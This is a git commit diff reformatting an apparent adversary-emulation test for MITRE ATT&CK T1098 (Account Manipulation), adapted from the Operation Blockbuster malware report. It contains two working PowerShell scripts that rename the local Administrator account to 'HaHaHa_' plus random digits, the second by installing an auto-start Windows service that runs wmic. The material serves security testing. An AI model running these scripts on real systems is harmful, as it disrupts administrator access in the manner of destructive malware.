Format and edits

Modified the format and cleaned it up.
2017-11-20 11:27:50 -08:00
parent 74c1c52bdb
commit 253282bceb
1 changed files with 49 additions and 51 deletions
@@ -1,64 +1,62 @@
-Account Manipulation
+# Account Manipulation

-MITRE ATT&CK Technique: T1098
-Tactic	Credential Access
+MITRE ATT&CK Technique: [T1098](https://attack.mitre.org/wiki/Technique/T1098)

-Account manipulation may aid adversaries in maintaining access to credentials and certain permission levels within an environment. Manipulation could consist of modifying permissions, adding or changing permission groups, modifying account settings, or modifying how authentication is performed. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain.
+Adapted from [Operation Blockbuster](https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf)

-Adapted from the c++ pseudo code https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf
-PS. The example in the PDF is incorrect: "sprintf(CmdLine, “cmd.exe /c net user Administrator %s”, newName);". Please advise if you consider otherwise.
+## Example 1

-Example 1:
-If successful, the Administrator account will be renamed with HaHaHa_ followed by 4 to 16 digits.
+If successful, the Administrator account will be renamed with `HaHaHa_` followed by 4 to 16 digits.

-$x = Get-Random -Minimum 2 -Maximum 9999
-$y = Get-Random -Minimum 2 -Maximum 9999
-$z = Get-Random -Minimum 2 -Maximum 9999
-$w = Get-Random -Minimum 2 -Maximum 9999
-Write-Host HaHaHa_$x$y$z$w
+    $x = Get-Random -Minimum 2 -Maximum 9999
+    $y = Get-Random -Minimum 2 -Maximum 9999
+    $z = Get-Random -Minimum 2 -Maximum 9999
+    $w = Get-Random -Minimum 2 -Maximum 9999
+    Write-Host HaHaHa_$x$y$z$w

-$hostname = (Get-CIMInstance CIM_ComputerSystem).Name
+    $hostname = (Get-CIMInstance CIM_ComputerSystem).Name

-$fmm = Get-CimInstance -ClassName win32_group -Filter "name = 'Administrators'" | Get-CimAssociatedInstance -Association win32_groupuser | Select Name
+    $fmm = Get-CimInstance -ClassName win32_group -Filter "name = 'Administrators'" | Get-CimAssociatedInstance -Association win32_groupuser | Select Name

-foreach($member in $fmm) {
-    if($member -like "*Administrator*") {
-        Rename-LocalUser -Name $member.Name -NewName "HaHaHa_$x$y$z$w"
-        Write-Host "Successfully Renamed Administrator Account on" $hostname
+    foreach($member in $fmm) {
+        if($member -like "*Administrator*") {
+            Rename-LocalUser -Name $member.Name -NewName "HaHaHa_$x$y$z$w"
+            Write-Host "Successfully Renamed Administrator Account on" $hostname
+            }
        }
+
+## Example 2
+
+If successful, the Administrator account will be renamed with `HaHaHa_` followed by 4 to 8 digits. 
+
+    $x = Get-Random -Minimum 2 -Maximum 99
+    $y = Get-Random -Minimum 2 -Maximum 99
+    $z = Get-Random -Minimum 2 -Maximum 99
+    $w = Get-Random -Minimum 2 -Maximum 99
+    $newadmin = "HaHaHa_$x$y$z$w".ToString()
+
+    $serviceName = "Rename Account Service"
+    $serviceDisplayName = "Rename Account Service" 
+    $serviceDescription = "Rename Account Service"
+    $serviceExecutable = "wmic useraccount where name='Administrator' rename '$newadmin'"
+
+    if (Get-Service $serviceName -ErrorAction SilentlyContinue)
+    {
+        $serviceToRemove = Get-WmiObject -Class Win32_Service -Filter "name='$serviceName'" 
+        $serviceToRemove | Stop-Service 
+        $serviceToRemove.delete() 
+    }
+    else
+    {
+        "service does not exists"
    }

-Example 2:
-If successful, the Administrator account will be renamed with HaHaHa_ followed by 4 to 8 digits. 
+    Write-Host "Installing service: $serviceName"
+    New-Service -name $serviceName -displayName $serviceDisplayName -binaryPathName $serviceExecutable -startupType Automatic -Description $serviceDescription
+    Write-Host "Installation completed: $serviceName"

-$x = Get-Random -Minimum 2 -Maximum 99
-$y = Get-Random -Minimum 2 -Maximum 99
-$z = Get-Random -Minimum 2 -Maximum 99
-$w = Get-Random -Minimum 2 -Maximum 99
-$newadmin = "HaHaHa_$x$y$z$w".ToString()
+    Write-Host "Trying to start new service: $serviceName"

-$serviceName = "Rename Account Service"
-$serviceDisplayName = "Rename Account Service" 
-$serviceDescription = "Rename Account Service"
-$serviceExecutable = "wmic useraccount where name='Administrator' rename '$newadmin'"
-
-if (Get-Service $serviceName -ErrorAction SilentlyContinue)
-{
-    $serviceToRemove = Get-WmiObject -Class Win32_Service -Filter "name='$serviceName'" 
-    $serviceToRemove | Stop-Service 
-    $serviceToRemove.delete() 
-}
-else
-{
-    "service does not exists"
-}
-
-Write-Host "Installing service: $serviceName"
-New-Service -name $serviceName -displayName $serviceDisplayName -binaryPathName $serviceExecutable -startupType Automatic -Description $serviceDescription
-Write-Host "Installation completed: $serviceName"
-
-Write-Host "Trying to start new service: $serviceName"
-
-$serviceToStart = Get-WmiObject -Class Win32_Service -Filter "name='$serviceName'" 
-$serviceToStart.startservice()
-Write-Host "Service started: $serviceName"
+    $serviceToStart = Get-WmiObject -Class Win32_Service -Filter "name='$serviceName'" 
+    $serviceToStart.startservice()
+    Write-Host "Service started: $serviceName"